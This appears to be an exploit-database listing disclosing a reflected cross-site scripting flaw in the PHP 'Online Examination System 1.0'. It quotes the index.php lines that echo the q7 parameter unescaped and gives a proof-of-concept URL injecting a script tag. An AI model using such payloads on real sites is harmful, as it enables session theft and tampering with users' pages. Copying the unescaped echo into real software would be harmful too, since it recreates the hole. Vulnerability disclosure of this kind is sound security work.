[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Online Examination System 1.0 Cross Site Scripting Vulnerability

Author
Yousef Alraddadi
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-38000
Category
web applications
Date add
29-09-2022
Platform
php
# Exploit Title: Online Examination System - Cross site scripting Reflected
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11
# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-examination/
# Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip
# Tested on: windows 11 - XAMPP
# CVE : N/A
# Version: 1.0

Vulnerability Details
======================

Steps :

vulnerable code in file index.php

157 <?php if(@$_GET['q7'])
158 { echo'<p style="color:red;font-size:15px;">'.@$_GET['q7'];}?>

http://localhost/examination/index.php?q7=%22%3E%3Cscript%3Ealert(%22yousef%22);%3C/script%3E

inject payload parameter q7

#  0day.today [2024-12-25]  #